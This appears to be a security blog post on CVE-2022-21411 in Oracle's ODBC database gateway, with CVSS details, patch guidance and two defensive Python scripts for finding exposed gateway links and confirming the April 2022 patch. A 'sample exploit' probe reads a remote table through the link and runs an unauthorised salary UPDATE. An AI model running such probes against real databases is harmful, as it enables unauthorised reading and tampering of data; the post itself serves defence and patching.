If you’re working with Oracle databases, especially Oracle Database Server versions 12.1.0.2, 19c, or 21c, you need to hear about CVE-2022-21411. This vulnerability affects the RDBMS Gateway / Generic ODBC Connectivity component, and a low-privileged attacker can use it to read or tamper with data that is reachable through the gateway.
In this post, we’ll explain the vulnerability in plain language, show how it works, and give you everything you need to know to protect your valuable database assets.
What is CVE-2022-21411?
CVE-2022-21411 is a security flaw in Oracle Database Server’s RDBMS Gateway / Generic ODBC Connectivity. Oracle’s RDBMS Gateway (Database Gateway for ODBC, dg4odbc) lets an Oracle database query and update other data sources through ODBC drivers; on the Oracle side the gateway is reached through an ordinary database link.
The vulnerable part is how the gateway handles certain database connections. An attacker who holds only the Create Session privilege and can reach the database over Oracle Net (the listener port, 1521 by default) can exploit this bug to:
- Update, insert, or delete some of the data reachable through the gateway
- Read a subset of the data reachable through the gateway
CVSS 3.1 Base Score: 5.4 (medium), vector AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Attack Vector: Network (Oracle Net protocol)
Privileges Required: Low (just Create Session)
User Interaction: None (no user has to be tricked)
Oracle advisory link:
Oracle Critical Patch Update Advisory - April 2022: https://www.oracle.com/security-alerts/cpuapr2022.html
Affected versions (the releases Oracle supported at the time of the advisory):
- 12.1.0.2
- 19c
- 21c
If the gateway is configured on one of these releases (a database link whose connect descriptor carries HS=OK) and the listener is reachable by accounts that hold Create Session, you are in scope. A PUBLIC database link to the gateway widens that to every account in the database, since public links are usable by all users.
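To find out whether you are in scope, you need two things: which tnsnames.ora aliases point at a gateway (they carry the HS=OK clause) and which database links, public or private, resolve to those aliases. The script below is an added example written for this post, not code from the original page or from Oracle; the tnsnames.ora text and the DBA_DB_LINKS rows are constructed samples with hypothetical names, and in a real check you would paste in the real file and the real rows from SELECT owner, db_link, host FROM dba_db_links.

```python
import re

# Constructed sample tnsnames.ora (not taken from any real host): one
# ordinary database service and one Database Gateway for ODBC entry.
# The gateway entry is recognisable by its (HS = OK) clause, which tells
# Oracle Net that the target is a Heterogeneous Services agent (dg4odbc)
# rather than another Oracle database.
SAMPLE_TNSNAMES = """
ORCLPDB =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521))
    (CONNECT_DATA = (SERVICE_NAME = orclpdb))
  )

LEGACY_ODBC =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = gwhost)(PORT = 1521))
    (CONNECT_DATA = (SID = dg4odbc))
    (HS = OK)
  )
"""

# Constructed rows in the shape returned by
#   SELECT owner, db_link, host FROM dba_db_links
# Owner and link names are hypothetical.
SAMPLE_DB_LINKS = [
    ("PUBLIC", "ODBC_LINK", "LEGACY_ODBC"),
    ("APP_SCHEMA", "REPORTS", "ORCLPDB"),
    ("HR", "HR_ODBC.EXAMPLE.COM", "legacy_odbc"),
]

# An alias definition starts at column 0; its descriptor lines are indented.
ALIAS_LINE = re.compile(r"^([A-Za-z0-9_.$#-]+)\s*=")
HS_OK = re.compile(r"\(\s*HS\s*=\s*OK\s*\)", re.IGNORECASE)


def gateway_aliases(tnsnames_text):
    """Return the upper-cased tnsnames aliases whose descriptor has (HS = OK)."""
    entries = []  # list of (alias, descriptor lines)
    for line in tnsnames_text.splitlines():
        m = ALIAS_LINE.match(line)
        if m:
            entries.append((m.group(1), []))
        elif entries:
            entries[-1][1].append(line)
    return {alias.upper() for alias, body in entries if HS_OK.search("\n".join(body))}


def gateway_links(db_links, aliases):
    """Return (owner, db_link, host, risk) for links that point at a gateway.

    HOST normally holds a tnsnames alias, but it may also hold a full
    connect descriptor, so the text itself is checked for (HS = OK) too.
    Alias lookup is case-insensitive, as it is in Oracle Net.
    """
    findings = []
    for owner, link, host in db_links:
        if host.strip().upper() in aliases or HS_OK.search(host):
            if owner == "PUBLIC":
                risk = "HIGH: public link, usable by every account that can log in"
            else:
                risk = (f"MEDIUM: private link of {owner}, reachable by other "
                        f"accounts only through views or synonyms {owner} grants")
            findings.append((owner, link, host, risk))
    return findings


if __name__ == "__main__":
    found = gateway_aliases(SAMPLE_TNSNAMES)
    print("gateway aliases:", sorted(found))
    for owner, link, host, risk in gateway_links(SAMPLE_DB_LINKS, found):
        print(f"{owner}.{link} -> {host}: {risk}")
```

Run it against the tnsnames.ora of the database home (and any file named by TNS_ADMIN) plus the live DBA_DB_LINKS rows; every HIGH finding is a link that any Create Session account can already drive, with or without this CVE.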
The Gist
The vulnerability lets an attacker abuse the ODBC gateway path to run SQL they are not authorized for, reading, changing or deleting data on the data source behind the gateway. Oracle describes it only as a flaw in RDBMS Gateway / Generic ODBC Connectivity and, as usual for a Critical Patch Update advisory, does not say which check is missing or not enforced strictly enough. The CVSS vector tells you what it amounts to in practice: an ordinary account, with no user interaction, gets more through the gateway than it should, with limited (not total) impact on confidentiality and integrity.
Sample Exploit Workflow
Here’s a simplified Python probe using Oracle’s cx_Oracle library. It assumes the attacker already holds valid low-privileged credentials and knows the name of a database link (odbc_link, a hypothetical name) that points at the gateway. It sends ordinary SQL across the link; it does not contain a trigger for the bug itself, which Oracle has not published.
import cx_Oracle

# Connect to the Oracle database that owns the ODBC gateway link, using
# an ordinary account that holds nothing beyond CREATE SESSION.
connection = cx_Oracle.connect("user/password@dbhost:1521/sid")
cursor = connection.cursor()

# Probe 1: read through the gateway. 'odbc_link' is the database link
# that points at the ODBC data source; 'sensitive_table' lives on the
# far side of the link, not in the Oracle database itself.
sql = "SELECT * FROM sensitive_table@odbc_link"
try:
    cursor.execute(sql)
    for row in cursor:
        print(row)  # data coming back across the link
except Exception as e:
    print(f"Failed to access: {e}")

# Probe 2: write through the gateway. The statement is executed on the
# remote data source under whatever credentials the link stores.
update_sql = "UPDATE sensitive_table@odbc_link SET salary = 10000 WHERE user = 'admin'"
try:
    cursor.execute(update_sql)
    connection.commit()
    print("Data changed successfully!")
except Exception as e:
    print(f"Update failed: {e}")

cursor.close()
connection.close()
Note: This is an illustration of the attack surface, not an exploit. On a patched system the script gets exactly the access that the local grants and the remote credentials stored in the link allow, and nothing more; what CVE-2022-21411 changes is that an account holding nothing but Create Session can get past that boundary through the gateway. The probe is still worth running with a low-privileged test account: if it succeeds, the link itself is over-exposed regardless of the patch level. Data exposed this way can then be used to launch further attacks against your infrastructure.
This is particularly dangerous in environments where legacy systems or external databases are linked by ODBC, as these often hold high-value or sensitive records and rarely have their own monitoring.
Remediation
Oracle released fixes for all supported versions as part of the April 2022 Critical Patch Update, delivered in the Release Updates for 19c and 21c and the patch set update for 12.1.0.2 of that CPU; every later Release Update contains the fix as well.
Apply the April 2022 Critical Patch Update for your Oracle Database *immediately*. Patch every Oracle home involved: a separately installed gateway home has its own patch inventory, and patching the database home alone does not update it.
Until the patch is on, reduce exposure: replace PUBLIC links to the gateway with private ones, make sure the credentials stored in each link carry only the remote privileges the application needs, and keep the set of accounts that can log in to the database as small as possible.
Oracle Patch Download page:
My Oracle Support (support.oracle.com), Patches & Updates
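Verifying that the patch is really on is more than checking for one patch number: the fix arrived in date-tagged Release Updates (19.15.0.0.220419, 21.6.0.0.220419, 12.1.0.2.220419), any later RU includes it, an RU that was rolled back does not count, and an OJVM RU alone does not touch the gateway component. The script below is an added example written for this post, not Oracle’s tooling; the DBA_REGISTRY_SQLPATCH rows are constructed samples with patch numbers left out, and in a real check you would feed it SELECT action, status, description FROM dba_registry_sqlpatch ORDER BY action_time for each database, and the matching opatch lspatches output for each home.

```python
import re

# The April 2022 CPU for the database shipped as Release Updates / patch
# set updates tagged with its release date, e.g. 19.15.0.0.220419,
# 21.6.0.0.220419 and 12.1.0.2.220419. Every later RU carries the same
# fix, so the test is: the newest Database RU/PSU still applied (not
# rolled back) is dated 220419 or later.
FIX_DATE_TAG = 220419

# Constructed rows in the shape of
#   SELECT action, status, description FROM dba_registry_sqlpatch
#   ORDER BY action_time
# Patch numbers are left out; the parser keys on the version tag only.
SAMPLE_UNPATCHED = [
    ("APPLY", "SUCCESS", "Database Release Update : 19.13.0.0.211019"),
    ("APPLY", "SUCCESS", "OJVM RELEASE UPDATE: 19.13.0.0.211019"),
]
SAMPLE_PATCHED = [
    ("APPLY", "SUCCESS", "Database Release Update : 19.13.0.0.211019"),
    ("APPLY", "SUCCESS", "Database Release Update : 19.15.0.0.220419"),
]
# An RU that was applied and later rolled back must not count.
SAMPLE_ROLLED_BACK = SAMPLE_PATCHED + [
    ("ROLLBACK", "SUCCESS", "Database Release Update : 19.15.0.0.220419"),
]
# A newer OJVM RU on its own does not patch the gateway component.
SAMPLE_OJVM_ONLY = [
    ("APPLY", "SUCCESS", "Database Release Update : 19.13.0.0.211019"),
    ("APPLY", "SUCCESS", "OJVM RELEASE UPDATE: 19.15.0.0.220419"),
]

# Matches "19.15.0.0.220419" style tags: four-part base version plus YYMMDD.
VERSION_TAG = re.compile(r"\b(\d+(?:\.\d+){3})\.(\d{6})\b")


def release_tag(description):
    """Return (base_version, yymmdd) from an RU/PSU description, else None.

    Works on dba_registry_sqlpatch descriptions and on 'opatch lspatches'
    lines alike, since both carry the same version string.
    """
    m = VERSION_TAG.search(description)
    return (m.group(1), int(m.group(2))) if m else None


def is_database_ru(description):
    """True for the Database RU/PSU itself, not OJVM or other bundles."""
    d = description.upper()
    return "OJVM" not in d and ("RELEASE UPDATE" in d or "PATCH SET UPDATE" in d)


def applied_database_rus(rows):
    """Replay the patch history and return the version strings still applied."""
    applied = set()
    for action, status, description in rows:
        if status != "SUCCESS" or not is_database_ru(description):
            continue
        tag = release_tag(description)
        if tag is None:
            continue
        version = f"{tag[0]}.{tag[1]}"
        if action == "APPLY":
            applied.add(version)
        elif action == "ROLLBACK":
            applied.discard(version)
    return applied


def cpu_applied(rows, fix_date_tag=FIX_DATE_TAG):
    """True if the newest applied Database RU/PSU is dated 220419 or later."""
    dates = [release_tag(v)[1] for v in applied_database_rus(rows)]
    return bool(dates) and max(dates) >= fix_date_tag


if __name__ == "__main__":
    for name, rows in [("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED),
                       ("rolled back", SAMPLE_ROLLED_BACK), ("OJVM only", SAMPLE_OJVM_ONLY)]:
        print(f"{name:12s} applied={sorted(applied_database_rus(rows))} "
              f"fixed={cpu_applied(rows)}")
```

DBA_REGISTRY_SQLPATCH only records the SQL side of an RU; run the same tag check over opatch lspatches in every home, including a separately installed gateway home, so that a database whose binaries were patched but whose datapatch step never ran (or the reverse) is not reported as fixed.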
Further Reading
- National Vulnerability Database Entry for CVE-2022-21411
- Oracle CPU April 2022 advisory
- Oracle Document: RDBMS Gateway Security
- Exploit details on Exploit-DB (search CVE-2022-21411)
Summary
CVE-2022-21411 is a medium-severity (CVSS 5.4) but easily reachable flaw in Oracle’s ODBC gateway. If you run Oracle databases with RDBMS Gateway / Generic ODBC Connectivity configured, patch as soon as possible. Attackers only need a basic account and network access to the listener; they don’t need to trick anyone or escalate privileges first. Left unpatched, the data behind your gateway links can be read or tampered with.
Timeline
Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/27/2022 17:46:00 UTC